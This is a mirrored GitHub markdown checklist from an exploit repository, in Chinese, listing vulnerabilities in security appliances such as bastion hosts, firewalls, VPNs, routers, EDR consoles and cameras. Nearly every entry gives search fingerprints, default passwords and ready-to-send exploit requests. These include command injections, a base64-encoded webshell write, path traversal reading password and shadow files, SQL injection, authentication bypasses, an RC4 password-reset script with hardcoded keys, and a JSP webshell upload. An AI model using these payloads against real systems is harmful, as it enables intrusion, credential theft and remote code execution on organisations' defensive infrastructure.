admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 03:17:19 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/CHECKLIST/安全设备漏洞 Checklist.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

866 lines
18 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 安全设备漏洞 Checklist
更新时间2023.06
##### **【免责声明】本项目所涉及的技术、思路和工具仅供学习,任何人不得将其用于非法用途和盈利,不得将其用于非授权渗透测试,否则后果自行承担,与本项目无关。使用本项目前请先阅读 [法律法规](https://github.com/Threekiii/Awesome-Laws)。**
✅ 表示漏洞文档已收录 [Vulnerability-Wiki]( https://github.com/Threekiii/Vulnerability-Wiki) 漏洞库仅收录2022/2023年部分安全设备全部 iot 漏洞列表见 [README.md](https://github.com/Threekiii/Vulnerability-Wiki/blob/master/docs-base/docs/iot/README.md)。参考阅读:[ffffffff0x/SecDevice-Exploits](https://github.com/ffffffff0x/1earn/blob/master/1earn/Security/RedTeam/%E5%AE%89%E9%98%B2%E8%AE%BE%E5%A4%87/SecDevice-Exploits.md#%E9%BD%90%E6%B2%BB%E5%A0%A1%E5%9E%92%E6%9C%BA)
## 一、身份与访问控制
### 0x01 堡垒机
#### 齐智堡垒机
FOFA
```
app="齐治科技-堡垒机"
```
##### 默认口令
```
shterm/shterm
```
##### shterm命令执行 tui.update.php
```
POST /shterm/listener/tui_update.php
a=["t';import os;os.popen('whoami')#"]
```
##### 前台命令执行 cluster_manage.php CNVD-2019-20835
访问以下路径,返回 ok
```
http://10.20.10.11/listener/cluster_manage.php
```
写入webshell
```
/var/www/shterm/resources/qrcode/lbj77.php 密码10086
```
```
https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}
```
##### 后台命令执行 data_provider.php CNVD-2019-17294
```
POST /audit/data_provider.php?ds_y=2019&ds_m=03&ds_d=02&ds_hour=01&ds_min=40&server_cond=&service=`id`&identity_cond=&query_type=all&format=json&browse=true
Host: your-ip
page=1&rp=30&sortname=stampl&sortorder=desc&query=&qtype=
```
##### 任意用户登录
```
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
```
#### H3C SecPath
FOFA
```
app="H3C-SecPath-运维审计系统" && body="2018"
```
#### Teleport 堡垒机
FOFA
```
app="TELEPORT堡垒机"
```
##### 任意用户登录
返回 code 为 0 说明成功,刷新首页即可进入后台:
```
POST /auth/do-login
args={"type":2,"username":"admin","password":null,"captcha":"xxxx","oath":"","remember":false}
```
##### 后台文件读取
```
/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0
```
### 0x02 IMC
#### H3C IMC 智能管理中心
FOFA
```
"/imc/javax.faces.resource/images/login_logo_h3c.png.jsf?ln=primefaces-imc-new-webui"
```
```
body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui"
```
```
body="iMC来宾接入自助管理系统"
```
##### 远程代码执行
```
POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 1567
pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami
```
## 二、网络检测与响应
### 0x01 蜜罐
### 0x02 IDS
#### 绿盟 UTS 综合威胁探针
##### 管理员任意登录
输入 admin/任意密码,点击登录。更改响应包,将 {"status":false,...} 中的 false 改为 true此时响应包将泄露 admin 用户密码的 md5 值。
利用 md5 值登录页面:
```
POST /webapi/v1/authen_user
{"username":"admin","password":md5}
```
### 0x03 防火墙
#### 安恒 明御WEB应用防火墙
FOFA
```
app="安恒信息-明御WAF"
```
##### report.php 任意用户登录✅
漏洞指纹:
```
/report.m?a=rpc-timed
/system.m?a=reserved
```
#### Cisco ASA
```
app="CISCO-ASA-5520"
```
##### 拒绝服务/敏感信息获取 CVE-2018-0296
exp
- https://github.com/yassineaboukir/CVE-2018-0296
- https://github.com/milo2012/CVE-2018-0296
##### 任意文件删除 CVE-2020-3187
exp
- https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html
##### 目录穿越/任意文件读取 CVE-2020-3452
漏洞影响
```
Cisco ASA 设备影响版本:
<9.6.1
9.6 < 9.6.4.42
9.71
9.8 < 9.8.4.20
9.9 < 9.9.2.74
9.10 < 9.10.1.42
9.12 < 9.12.3.12
9.13 < 9.13.1.10
9.14 < 9.14.1.10
```
```
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
```
#### H3C SecPath下一代防火墙
FOFA
```
title="Web user login"
```
##### 任意文件下载 ✅
```
/webui/?g=sys_dia_data_check&file_name=../../etc/passwd
```
```
/webui/?
g=sys_capture_file_download&name=../../../../../../../../etc/passwd
```
#### 奇安信 网康下一代防火墙
FOFA
```
app="网康科技-下一代防火墙"
```
##### 远程命令执行 ✅
```
POST /directdata/direct/router HTTP/1.1
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
```
访问:
```
https://x.x.x.x/test_test.txt
```
#### 启明星辰 天清汉马USG防火墙
##### 默认口令
```
useradmin/venus.user
```
#### 佑友防火墙
##### 默认口令
```
admin/hicomadmin
```
##### 后台命令执行
```
系统管理 --> 维护工具 --> Ping
127.0.0.1|cat /etc/passwd
```
#### ZeroShell
FOFA
```
app="Zeroshell-防火墙"
```
##### ZeroShell 3.9.0 cgi-bin/kerbynet 命令执行
exp
- https://www.exploit-db.com/exploits/49096
### 0x04 网关
#### 奇安信 网康 NS-ASG 安全网关
FOFA
```
网康 NS-ASG 安全网关
```
##### 任意文件读取 ✅
```
/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
```
#### 安恒 明御安全网关
##### 命令执行/任意文件读取✅
漏洞指纹:
```
/webui/?g=aaa_portal_auth_local_submit&suffix=
/webui/?g=sys_dia_data_down&file_name=
/webui/?g=sys_dia_data_check&file_name=
...
```
#### 锐捷 EG 易网关
##### 管理员账号密码泄露 ✅
获取账号密码:
```
POST /login.php HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
username=admin&password=admin?show+webmaster+user
```
##### branch_passw.php 远程命令执行 ✅
发送请求包:
```
POST /itbox_pi/branch_passw.php?a=set HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=52222egp72ilkpf2de7qbrigk3;user=admin;
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
pass=|cat /etc/psswd>../test_test.txt
```
再访问:
```
http://your-ip/test_test.txt
```
##### cli.php 远程命令执行 ✅
发送请求包:
```
POST /cli.php?a=shell HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 24
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=nk5erth9i0pvcco3n7fbpa9bi0;user=admin;
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
notdelay=true&command=id
```
##### download.php 任意文件读取 ✅
poc
```
/download.php?a=read_txt&file=../../../../etc/passwd
```
#### 锐捷 ISG 视频接入安全网关
##### 账号密码泄露漏洞 ✅
FOFA
```
title="RG-ISG"
```
F12 查看到账号密码解密md5 后登陆系统。
### 0x05 路由器
#### D-Link DAP-2020
FOFA
```
body="DAP-1360" && body="6.05"
```
##### webproc 任意文件读取 CVE-2021-27250 ✅
poc
```
POST /cgi-bin/webproc
getpage=html%2Findex.html&errorpage=/etc/passwd&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=123&%3Aaction=login&%3Asessionid=3c1f7123
```
#### H3C 企业路由器ER、ERG2、GR系列
##### 任意用户登录漏洞 ✅
攻击者可通过访问 /userLogin.asp/../actionpolicy_status/../xxxx.cfg 接口xxxx 为设备型号(比如设备型号为 ER5200G2即访问 /userLogin.asp/../actionpolicy_status/../ER5200G2.cfg绕过 COOKIE 验证,进行目录穿越,获取设备的明文配置文件。
配置中有明文的 Web 管理员账号 admin 密码,登录后台可通过开启 telnet 获取命令执行权限。
#### iKuai 路由器
FOFA
```
title="登录爱快流控路由"
```
##### 后台任意文件读取✅
默认密码admin/admin
poc
```
GET /Action/download?filename=../../../../../../etc/shadow HTTP/1.1
Host
....
```
##### 流控路由 SQL注入漏洞✅
万能密码登录:
```
user: "or""=""or""="
pass: 空
```
#### 锐捷 NBR路由器
##### 远程命令执行漏洞 CNVD-2021-09650 ✅
FOFA
```
title="锐捷网络-EWEB网管系统"
icon_hash="-692947551"
```
构造命令执行:
```
POST /guest_auth/guestIsUp.php
mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt
```
再访问:
```
/guest_auth/test.txt
```
### 0x06 负载均衡
#### Citrix ADC
##### 默认口令
```
nsroot/nsroot
```
##### 远程代码执行 CVE-2019-19781
访问以下链接返回403则表示不存在漏洞返回smb.conf则证明漏洞存在。
```
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is --insecure
```
exp
- https://github.com/trustedsec/cve-2019-19781
- https://github.com/jas502n/CVE-2019-19781
#### F5 BIG-IP
##### 远程代码执行 CVE-2020-5902
exp
- https://github.com/jas502n/CVE-2020-5902
- https://github.com/theLSA/f5-bigip-rce-cve-2020-5902
##### 远程代码执行 CVE-2021-22986
```
POST /mgmt/tm/util/bash HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token:
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 41
{"command":"run","utilCmdArgs":"-c id"}
```
exp
- https://github.com/h4x0r-dz/RCE-Exploit-in-BIG-IP
- https://github.com/Al1ex/CVE-2021-22986
#### 天融信 Top-app LB
##### SQL注入
```
POST /acc/clsf/report/datasource.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22-- &o=r_Speed&gid=0&lmt=10&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=
```
#### 无密码登录
```
任意用户名 密码:;id
```
### 0x07 VPN
#### Fortigate SSL VPN
FOFA
```
fofa: icon_hash="-404383634" app="FORTINET-防火墙"
```
##### 密码读取 CVE-2018-13379
exphttps://github.com/milo2012/CVE-2018-13379
##### 任意密码重置 CVE-2018-13382
exphttps://github.com/milo2012/CVE-2018-13382
##### 认证绕过 CVE-2022-40684
exphttps://github.com/horizon3ai/CVE-2022-40684
```
git clone https://github.com/horizon3ai/CVE-2022-40684.git
cd CVE-2022-40684
ssh-keygen -t rsa
python3 CVE-2022-40684.py -t 1.1.1.1 --username admin --key-file ~/.ssh/id_rsa.pub
ssh admin@1.1.1.1
```
#### Palo Alto SSL VPN
##### GlobalProtect 远程代码执行 CVE-2019-1579
exphttps://github.com/securifera/CVE-2019-1579
#### Pulse Secure SSL VPN
##### 任意文件读取 CVE-2019-11510
exphttps://github.com/projectzeroindia/CVE-2019-11510
##### 远程代码执行 CVE-2019-11539
exphttps://github.com/0xDezzy/CVE-2019-11539
#### 深信服 VPN
##### 常见密码
```
admin/sangfor@123
sangfor/sangfor
test/test
test1/123456b
```
##### 口令爆破
用户登录若多次尝试登录失败会要求输入验证码若输入错误的验证码会提示“校验码错误或校验码已过期”修改登录请求的数据包清空cookie和验证码字段的值即可绕过验证码此时提示“用户名或密码错误”。
```
/por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd=
```
##### 短信绕过
```
POST https://ip/por/changetelnum.csp?apiversion=1
newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1
```
##### 任意密码重置
加密算法使用了默认的key攻击者构利用key构造重置密码数据包从而修改任意用户的密码。利用需要登陆账号。
- M7.6.6R1版本key为20181118
- M7.6.1key为20100720
```
POST /por/changepwd.csp
sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN(脚本计算后结果)
```
```python
from Crypto.Cipher import ARC4
from binascii import a2b_hex
def myRC4(data, key):
rc41= ARC4.new(key)
encrypted =rc41.encrypt(data)
return encrypted. encode('hex')
def rc4_decrpt_hex(data, key):
rc41= ARC4. new(key)
return rc41. decrypt(a2b_hex(data))
key= '20100720'
data = r',username-TARGET_USERNAME, ip-127.0.0.1,grpid-1, pripsw-suiyi , newpsw=TARGET PASSWORD,'
print myRC4(data, key)
```
#### 锐捷 SSL VPN
FOFA
```
icon_hash="884334722" || title="Ruijie SSL VPN"
```
##### 越权访问
- UserName 参数为已知用户名
```
GET /cgi-bin/main.cgi?oper=getrsc HTTP/1.1
Cookie: UserName=admin; SessionId=1; FirstVist=1; Skin=1; tunnel=1
```
#### Juniper SSL VPN
- [Juniper SSLVPN / JunOS RCE and Multiple Vulnerabilities](https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/)
## 三、终端响应与检测
### 0x01 EDR/杀软
#### 深信服 EDR
##### 命令执行1
exphttps://github.com/BH2UOL/sangfor-edr-exploit
##### 命令执行2
```
POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
{"params":"w=123\"'1234123'\"|命令"}
```
##### 后台任意用户登录
```
xxx.xxx.xxx.xxx/ui/login.php?user=admin
```
#### 360天擎
FOFA
```
title="360天擎"
```
##### 前台SQL注入
```
/api/dp/rptsvcsyncpoint?ccid=1
```
##### 数据库信息泄露
```
http://x.x.x.x/api/dbstat/gettablessize
```
#### 金山 V8 终端安全系统
FOFA
```
title="在线安装-V8+终端安全系统Web控制台"
```
##### 任意文件读取
```
/htmltopdf/downfile.php?filename=downfile.php
```
##### pdf_maker.php 命令执行
```
POST /inter/pdf_maker.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx
```
#### 金山 VGM防毒墙
FOFA
```
"金山VGM"
```
##### downFile.php 任意文件读取
poc
```
/downFile.php?filename=../../../../etc/passwd
```
### 0x02 数据防泄漏系统
#### 天融信数据防泄漏系统
##### 越权修改管理员密码
无需登录权限,由于修改密码处未校验原密码,且 /?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任意用户密码。 默认 superman 账户 uid 为 1。
```
POST /?module=auth_user&action=mod_edit_pwd
Cookie: username=superman;
uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1
```
## 四、其他
### 0x01 网络摄像机
#### Hikvision DS/IDS/IPC 等设备
FOFA
```
"671-1e0-587ec4a1"
```
##### 远程命令执行 CVE-2021-36260 ✅
```
python CVE-2021-36260.py --rhost 127.0.0.1 --rport 8081 --cmd "ls"
```
### 0x02 综合管理平台
#### 大华 智慧园区综合管理平台
FOFA
```
app="dahua-智慧园区综合管理平台"
```
##### user_save.action 任意文件上传 ✅
漏洞指纹:
```
POST /admin/user_save.action
```
```
POST /WPMS/getPublicKey
```
#### 大华 城市安防监控系统平台管理
FOFA
```
"attachment_downloadByUrlAtt.action"
```
##### attachment_downloadByUrlAtt.action 任意文件下载 ✅
poc
```
/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
```
#### Hikvision iVMS-8700综合安防管理平台
FOFA
```
icon_hash="-911494769"
```
##### 任意文件下载 ✅
验证POCtoken 为 URL md5
```
/eps/api/triggerSnapshot/download?token=xxx&fileUrl=file:///C:/windows/win.ini&fileName=1
```
##### 任意文件上传 ✅
发送请求包上传文件:
```
POST /eps/resourceOperations/upload.action HTTP/1.1
Host:
------WebKitFormBoundaryTJyhtTNqdMNLZLhj
Content-Disposition: form-data; name="fileUploader";filename="test.jsp"
Content-Type: image/jpeg
<%out.print("hello");%>
------WebKitFormBoundaryTJyhtTNqdMNLZLhj--
```
访问webshell
```
/eps/upload/769badc8ef5944da804a4ca3c8ecafb0.jsp
```
Reference in New Issue View Git Blame Copy Permalink